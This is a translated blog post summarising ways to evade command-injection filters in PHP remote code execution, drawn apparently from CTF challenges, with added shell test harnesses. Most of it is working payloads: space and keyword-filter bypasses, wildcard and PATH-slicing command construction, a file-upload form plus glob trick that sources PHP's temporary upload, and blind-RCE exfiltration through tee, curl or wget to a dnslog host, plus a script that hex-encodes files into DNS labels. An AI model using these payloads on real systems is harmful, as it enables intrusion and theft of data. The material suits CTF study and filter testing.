RCE (Remote Command Execution) Bypass Summary

Table of contents

Foreword
1. Common alternative commands
2. Space bypass
3. Simple symbols bypass the regex filter
   1. Single and double quotation marks
   2. The line-continuation character '\'
4. Wildcards bypass the regex filter
   1. Commands that can be reached with wildcards
      base64
      bzip2
   2. String wildcards
5. Variable splicing bypasses the regex filter
6. Inline execution
7. "${}" environment variable slicing and splicing
8. [] bracket expressions bypass the regex filter
9. The source command
10. RCE without echo
   Execution functions without echo
   1. Copy to an accessible file (tee command)
   2. dnslog out-of-band method
   3. Reverse shell


Foreword:

The RCE bypass methods in this article were all encountered by the author in CTF challenges and real penetration tests. There may be omissions or mistakes; I hope readers will point them out, thank you!

1. Common alternative commands:

When cat is filtered, any of the following will also read a file (or, for the last two, list a directory):

more: displays the file contents one page at a time
less: similar to more
head: shows the first few lines
tac: prints from the last line upwards, i.e. cat in reverse
tail: shows the last few lines
nl: prints the file with line numbers added
od: dumps the file bytes in octal, or in hex (-x) or character (-c) form
vi: an editor, but it can be used to read a file too
vim: an editor, but it can be used to read a file too
sort: can read a file (prints its lines sorted)
uniq: can read a file (collapses adjacent duplicate lines)
ls: lists a directory
dir: lists a directory

2. Space bypass

When the space character is filtered, the following can stand in for it:

> < <>     redirection operators (the shell needs no space around them)
%20        URL-encoded space
%09        URL-encoded tab
$IFS$9     the empty positional parameter $9 simply terminates the variable name
${IFS}     the most reliable form
$IFS       only works when the next character cannot be part of a variable name; cat$IFSflag.txt is parsed as the variable $IFSflag and the command breaks
{cat,flag.txt}   inside braces the comma acts as the separator (bash brace expansion)

3. Simple symbols bypass the regex filter

1. Single and double quotation marks

ca''t flag.txt
ca""t flag.txt

Because there is nothing between the quotation marks, inserting them is the same as inserting no characters at all: the command keeps its meaning while the literal string cat no longer appears in the input.

2. The line-continuation character '\'

A backslash at the very end of a line tells the shell that the command continues on the next line, so the two lines are parsed together as a single command: writing ca, then a backslash and a newline, then t flag.txt, is read as cat flag.txt. (A backslash in front of an ordinary letter is simply dropped, so the same escape also works in the middle of a word.)

4. Wildcards bypass the regex filter

Wildcards stand in for the characters of a filtered word; the shell replaces the pattern with the names of the files that actually match it.

The shell wildcards are:

  • * : matches any sequence of zero or more characters
  • ? : matches exactly one character

1. Commands that can be reached with wildcards

base64:

/bin/base64 can be written with wildcards as:

/???/????64

The digits are kept as anchors so that the pattern stays unambiguous. It prints the file base64-encoded, to be decoded locally afterwards.

 bzip2:

/usr/bin/bzip2 can be written with wildcards as:

/???/???/????2

It compresses the file into a .bz2 archive that can then be downloaded:
flag.php ==>  flag.php.bz2

2. String wildcards

flag.php ==> flag.???
             flag*
             ……

Wildcards can also replace part of a command name, as long as the pattern still resolves to a file:

for example:
/bin/ca?
is equivalent to the cat command

Note that if the pattern matches more than one file the shell passes all of the matches, so the first one becomes the command and the rest become its arguments (in /bin, ca? may also match cal); keep digits as anchors or use the bracket ranges of section 8 to narrow it down.

5. Variable splicing bypasses the regex filter

A variable can be defined inside the shell statement so that the filtered string is split into pieces that only come back together when the variable is expanded:

Taking flag.php as an example:

x=lag;cat f$x.php

is equivalent to:

cat flag.php

6. Inline execution

Inline execution (command substitution) embeds a subshell command inside a shell statement; the outer command then works on the output of the inner one.

The syntax for command substitution is $( ) or `` (backticks). Note that ${ } is parameter expansion, not command substitution: ${ls} expands a variable named ls (normally empty) and does not run ls.

For example:

echo `ls`

echo $(ls)

Both print the output of ls through echo.
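To see which of the payloads from sections 2 to 6 actually survive a shell, here is a small harness, added as an example and not part of the original post: it hands each string to bash inside a scratch directory holding a flag.txt and a flag.php with made-up contents, the way a vulnerable system($_GET['c']) would, and prints what comes back. bash is assumed (brace expansion and ${IFS} behave as described there); the directory, file names, flag strings and the run_payload/check helpers are constructed for the demo.

```shell
# Added example (not from the original post). A scratch directory with known
# files stands in for the web root; the names and flag contents are made up.
LAB=$(mktemp -d)
printf 'flag{space-bypass}\n' > "$LAB/flag.txt"
printf 'flag{var-splice}\n'   > "$LAB/flag.php"

# Run one payload string the way a vulnerable system($_GET['c']) would: hand it
# to bash from inside the web root and return its stdout. bash is assumed since
# brace expansion and ${IFS} behave as the article describes there. stdin is
# /dev/null so a payload that degenerates into a bare read never hangs.
run_payload() {
    ( cd "$LAB" && bash -c "$1" </dev/null 2>/dev/null )
}

# The line-continuation payload: "ca\" on one line, "t flag.txt" on the next.
CONTINUATION=$(printf 'ca\\\nt flag.txt')

# Run a payload and compare its output with what the bypass should produce.
check() {
    got=$(run_payload "$1")
    if [ "$got" = "$2" ]; then printf 'PASS  %-22s => %s\n' "$1" "$got"
    else printf 'FAIL  %-22s => [%s]\n' "$1" "$got"; fi
}

# Section 2: substitutes for the space character
check 'cat${IFS}flag.txt'   'flag{space-bypass}'
check 'cat$IFS$9flag.txt'   'flag{space-bypass}'
check 'cat<flag.txt'        'flag{space-bypass}'
check '{cat,flag.txt}'      'flag{space-bypass}'
# Pitfall: $IFS directly followed by a letter is read as the variable $IFSflag,
# so this payload tries to run a command called cat.txt and produces nothing.
check 'cat$IFSflag.txt'     ''
# Section 3: empty quotes and backslash-newline leave the command intact
check "ca''t flag.txt"      'flag{space-bypass}'
check 'ca""t flag.txt'      'flag{space-bypass}'
check "$CONTINUATION"       'flag{space-bypass}'
# Section 5: the filtered name only exists after variable expansion
check 'x=lag;cat f$x.php'   'flag{var-splice}'
# Section 6: $( ) and backticks run a command; ${ } only expands a variable
check 'echo $(ls)'          'flag.php flag.txt'
check 'echo ${ls}'          ''
```

Every payload is passed in single quotes so that the harness's own shell does not expand it; expansion happens only inside the bash that plays the vulnerable script. The two FAIL lines are the point of the exercise: they are the forms that look right on paper but do nothing once the shell parses them.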

7. "${}" environment variable slicing and splicing

For the general usage of ${} see the author's blog post http://t.csdn.cn/JDFmP

${VAR:offset:length} extracts a substring of a variable (a bash feature), so individual characters can be picked out of an environment variable such as PATH and concatenated into a command name that the filter would otherwise block.

example

${PATH:14:1}${PATH:5:1} flag.txt

In that environment this is equivalent to nl flag.txt: assuming the usual PATH=/usr/local/sbin:/usr/local/bin:..., offset 14 is the n of sbin and offset 5 is the l of local. The offsets depend on the target's PATH, so check it first (echo $PATH).
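Finding the offsets by hand is error-prone, so here is an added example (not from the original post) that builds the ${VAR:offset:1} chain for a target command from a variable's value and lets bash confirm the expansion. EXAMPLE_PATH is a constructed PATH value (the common Debian default), not the PATH of this machine, and the slice_expr and expand_with helpers are assumptions of the example.

```shell
# Added example (not from the original post). EXAMPLE_PATH is a constructed
# value (the usual Debian default), not read from this machine, so the offsets
# are deterministic; on a real target substitute the PATH found there.
EXAMPLE_PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'

# slice_expr VARNAME VALUE TARGET -> e.g. ${PATH:14:1}${PATH:5:1}
# Every character of TARGET is located in VALUE (first occurrence, 0-based
# offset) and emitted as a one-character ${VAR:off:1} slice. Fails if some
# character of TARGET does not occur in VALUE at all.
slice_expr() {
    var=$1; value=$2; target=$3; out=""; i=1
    while [ "$i" -le "${#target}" ]; do
        ch=$(printf '%s' "$target" | cut -c "$i")
        off=$(awk -v s="$value" -v c="$ch" 'BEGIN { print index(s, c) - 1 }')
        if [ "$off" -lt 0 ]; then
            echo "slice_expr: '$ch' does not occur in \$$var" >&2
            return 1
        fi
        out="$out\${$var:$off:1}"
        i=$((i + 1))
    done
    printf '%s\n' "$out"
}

# expand_with VARNAME VALUE EXPR -> what bash expands EXPR to when VARNAME=VALUE
# (substring expansion is bash-only, so the check is delegated to bash).
expand_with() {
    bash -c "$1=\$1; printf '%s\n' \"$3\"" _ "$2"
}

for cmd in nl ls; do
    e=$(slice_expr PATH "$EXAMPLE_PATH" "$cmd")
    printf '%-4s <- %s = %s\n' "$cmd" "$e" "$(expand_with PATH "$EXAMPLE_PATH" "$e")"
done
# cat cannot be spelled from this PATH: there is no 't' anywhere in it.
slice_expr PATH "$EXAMPLE_PATH" cat || echo "pick another variable for cat"
```

The failure case is worth keeping in mind: a default PATH contains no t, so cat has to be assembled from a different variable (or from a longer PATH on the target), which is exactly why the article falls back to nl.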

8. [] bracket expressions bypass the regex filter

A bracket expression matches one character out of a set: [a-c] matches a, b or c (the range is inclusive), and [abc] lists the characters explicitly.

Like the other wildcards it is matched against file names, relative to the current directory unless a path is given.

example

/[a-c][h-j][m-o]/[b-d]a[s-u] flag.txt

is equivalent to

/bin/cat flag.txt

Because [] patterns are resolved against the current directory, the path to bin has to be given in full; a bare [b-d]a[s-u] would look for cat in the web root and would not expand.
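Sections 4 and 8 both rely on the shell expanding a pattern against real file names, and both can silently go wrong when a pattern matches more than one file or nothing at all. The following added example (not from the original post) builds a scratch directory tree standing in for / with constructed bin/cat, bin/cal, bin/base64 and usr/bin/bzip2 entries, then expands the article's patterns against it and counts the matches; path_to_glob, expand_glob and count_matches are helpers assumed by the example.

```shell
# Added example (not from the original post): a scratch tree that stands in
# for "/" so the patterns can be expanded without touching the real system.
# File names are constructed; the extra bin/cal shows an ambiguous pattern.
LAB=$(mktemp -d)
mkdir -p "$LAB/bin" "$LAB/usr/bin"
for f in bin/cat bin/cal bin/base64 usr/bin/bzip2; do : > "$LAB/$f"; done

# path_to_glob PATH -> the pattern the article uses: every letter becomes ?,
# digits and slashes stay as anchors.  /bin/base64 -> /???/????64
path_to_glob() { printf '%s\n' "$1" | LC_ALL=C sed 's/[A-Za-z]/?/g'; }

# expand_glob PATTERN -> every match, one per line; exit 1 if nothing matches.
# LC_ALL=C so that ranges such as [@-[] mean byte values 0x40..0x5B exactly.
expand_glob() {
    ( LC_ALL=C; export LC_ALL; set -- $1; [ -e "$1" ] || exit 1; printf '%s\n' "$@" )
}

count_matches() { expand_glob "$1" | wc -l | tr -d ' '; }

echo "--- base64 via $(path_to_glob /bin/base64) ---"
expand_glob "$LAB/$(path_to_glob bin/base64)"
echo "--- bzip2 via $(path_to_glob /usr/bin/bzip2) ---"
expand_glob "$LAB/$(path_to_glob usr/bin/bzip2)"
echo "--- /???/ca? is ambiguous here: $(count_matches "$LAB/???/ca?") matches ---"
expand_glob "$LAB/???/ca?"
echo "--- bracket ranges with an absolute path ---"
expand_glob "$LAB/[a-c][h-j][m-o]/[b-d]a[s-u]"
echo "--- the same pattern relative to the web root ---"
( cd "$LAB" && expand_glob '[b-d]a[s-u]' ) || echo "(no match: [] only looks in the current directory)"
```

Run count_matches on every candidate pattern before sending it: a count of 1 means the command is unambiguous, a count above 1 means the shell will pass the extra matches as arguments, and 0 means the filter never even gets to see a real command.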

9. The source command:

The source command, also known as the dot command, can be written as a single dot ( . )

It reads the given file and executes the commands in it in the current shell.

So the attack is: build a file-upload form, upload a file containing the commands, and point the dot command at the temporary copy that PHP makes of the upload.

The form is:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST request PoC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--the action is the URL of the challenge currently open-->
    <label for="file">File:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

The GET parameter is

?c=.+/???/????????[@-[]

(+ is the URL-encoded space.) On Linux PHP stores an upload as /tmp/phpXXXXXX, where the six trailing characters are random and mixed-case, so the name has to be reached with a glob. [@-[] is the ASCII range from @ to [, which covers the uppercase letters A-Z, so the pattern only matches when the random suffix happens to end in an uppercase letter; keep resubmitting until it does. PHP deletes the temporary file when the request ends, so the c parameter must travel on the same request as the upload (append it to the form's action URL).

Note: executing a file through . does not require the execute permission bit, only read access.

See p神's article "Improvement of non-alphanumeric webshell" on the 离别歌 (Farewell Song) blog.
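The two facts this section depends on, that the dot command runs a file without its execute bit and that [@-[] only admits a name ending in an uppercase letter, can be checked locally. The following is an added example, not from the original post: a scratch directory stands in for /, two constructed file names stand in for PHP's random /tmp/phpXXXXXX, and the glob_candidates, source_via_glob and direct_exec_fails helpers are assumptions of the example.

```shell
# Added example (not from the original post). A scratch directory stands in
# for "/" and two constructed names stand in for PHP's random /tmp/phpXXXXXX.
LAB=$(mktemp -d)
mkdir -p "$LAB/tmp"
printf 'echo sourced-ok\n' > "$LAB/tmp/phpAb3xQZ"   # ends in uppercase: matched
printf 'echo wrong-file\n' > "$LAB/tmp/phpAb3xQz"   # ends in lowercase: skipped
chmod 0644 "$LAB/tmp/phpAb3xQZ" "$LAB/tmp/phpAb3xQz" # readable, not executable

# The glob from the article with the lab root in place of "/". LC_ALL=C keeps
# [@-[] equal to the byte range 0x40-0x5B (@, A-Z, [) regardless of locale.
glob_candidates() {
    ( cd "$LAB" || exit 1
      LC_ALL=C; export LC_ALL
      set -- ./???/????????[@-[]
      echo "$# $*" )
}

# What "?c=. /???/????????[@-[]" makes the shell do: source the matched file.
source_via_glob() {
    ( cd "$LAB" || exit 1
      LC_ALL=C; export LC_ALL
      . ./???/????????[@-[] )
}

# Running the same file directly is refused because it has no execute bit.
direct_exec_fails() {
    if ( cd "$LAB" && ./tmp/phpAb3xQZ ) 2>/dev/null; then return 1; else return 0; fi
}

echo "glob matches: $(glob_candidates)"   # 1 ./tmp/phpAb3xQZ
echo "sourced:      $(source_via_glob)"   # sourced-ok
direct_exec_fails && echo "direct execution refused (no execute bit)"
```

If two uploads happened to be left behind with uppercase endings, glob_candidates would report 2 and the dot command would source the first and treat the second as a positional parameter, so on a shared target it is worth checking the count before relying on the trick.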

10. RCE without echo:

Execution functions without echo:

exec()

shell_exec()

`` (backtick)

These hand the command output back to PHP instead of printing it, so unless the script passes the result to echo the attacker sees nothing (system() and passthru(), by contrast, print directly).

1. Copy to an accessible file

tee command:

tee reads its standard input and writes it into a file (creating it, or appending with -a) while also passing it through.

Combined with a file-reading command such as cat and the pipe character, it writes the flag into a file of the attacker's choosing under the web root.

For example

First copy the listing of the root directory into a file, then open that file in the browser:
ls /| tee ls.txt

Then request url/ls.txt to see the root directory listing.
Next copy the flag file and open it the same way:
cat /flag.php | tee flag.txt

Then request url/flag.txt to read the flag.
Other ways of copying the file also work:
cp /flag.php flag.txt

mv /flag.php flag.txt

(cp rather than copy, which is a Windows command; note that mv moves the original away, which is noisy and can break the application.)
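To make the "no echo" situation concrete, here is an added example (not from the original post): blind_exec models an exec() whose return value is never printed, fetch models the follow-up browser request, and the web root and flag file are constructed for the demo.

```shell
# Added example (not from the original post). WEBROOT is a scratch directory
# standing in for the directory the vulnerable script runs in; the flag file
# is constructed.
WEBROOT=$(mktemp -d)
printf 'flag{no-echo}\n' > "$WEBROOT/flag.php"

# blind_exec CMD: what exec()/shell_exec() without an echo amounts to from the
# attacker's side. The command runs, its output goes nowhere, only side
# effects on the filesystem remain.
blind_exec() { ( cd "$WEBROOT" && bash -c "$1" >/dev/null 2>&1 ); }

# fetch NAME: the body a later GET /NAME against the web root would return.
fetch() { cat "$WEBROOT/$1" 2>/dev/null; }

blind_exec 'cat flag.php'                   # output discarded, nothing to read back
echo "before tee: [$(fetch flag.txt)]"
blind_exec 'cat flag.php | tee flag.txt'    # tee leaves a copy in the web root
echo "via tee:    [$(fetch flag.txt)]"
blind_exec 'ls / | tee ls.txt'              # same trick for a directory listing
blind_exec 'cp flag.php copy.txt'           # cp works too; mv would take the original away
echo "via cp:     [$(fetch copy.txt)]"
```

The dropped file has to land somewhere the web server will serve and with an extension it serves as plain text; a .php copy would be executed rather than shown, which is why the article writes to .txt.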

2. dnslog out-of-band method

Requires a dnslog platform, which you can also host yourself:

curl dnslog-platform-url/`cat flag.php|base64`
wget dnslog-platform-url/`cat flag.php|base64`

Two caveats: base64 wraps its output at 76 characters, so anything longer than one line breaks the URL; use base64 -w0 (GNU coreutils) to get a single line. And if the data has to travel in a DNS name rather than an HTTP path, a label holds at most 63 characters (253 for the whole name) and +, / and = are not valid in hostnames, so hex-encode it and split it into labels.
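An added example (not from the original post) of the encoding the DNS route needs: the secret is a constructed file, example.test is a placeholder for the dnslog domain, nothing is actually resolved, and hex_labels, query_names and reassemble are helpers assumed by the example. query_names prints the names the target would be made to look up and reassemble shows how the receiver decodes what lands in its log.

```shell
# Added example (not from the original post). The secret file is constructed
# and example.test is a placeholder for the dnslog domain; nothing is resolved.
LAB=$(mktemp -d)
printf 'flag{dns-exfil}\n' > "$LAB/flag.php"

# hex_labels FILE LEN -> the file as hex, cut into pieces of LEN characters.
# Hex rather than base64 because '+', '/' and '=' are not valid in hostnames;
# a DNS label holds at most 63 characters and a whole name at most 253.
hex_labels() {
    { od -An -v -tx1 "$1" | tr -d ' \n'; echo; } | fold -w "$2"
}

# query_names FILE LEN DOMAIN -> one query name per line, e.g.
# 0.666c6167.example.test; the leading number lets the receiver reorder
# pieces that arrive out of sequence or are served from a resolver cache.
query_names() {
    n=0
    hex_labels "$1" "$2" | while IFS= read -r label; do
        printf '%d.%s.%s\n' "$n" "$label" "$3"
        n=$((n + 1))
    done
}

# reassemble (names on stdin) -> the original bytes: sort by sequence number,
# keep the hex label, decode two hex digits at a time.
reassemble() {
    sort -t. -k1,1n | cut -d. -f2 | tr -d '\n' |
    awk 'BEGIN { h = "0123456789abcdef" }
         { for (i = 1; i <= length($0); i += 2)
               printf "%c", (index(h, substr($0, i, 1)) - 1) * 16 + index(h, substr($0, i + 1, 1)) - 1 }'
}

echo "names the target would resolve:"
query_names "$LAB/flag.php" 8 example.test
printf 'receiver decodes: %s' "$(query_names "$LAB/flag.php" 8 example.test | sort -r | reassemble)"
```

On the target each name is handed to the resolver with whatever is available (curl, wget, nslookup, or even ping); the sort -r before reassemble deliberately scrambles the order to show that the sequence prefix, not arrival order, is what the receiver relies on.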

3. Reverse shell:

I will write this up together with the privilege escalation post.

Origin blog.csdn.net/Elite__zhb/article/details/130208829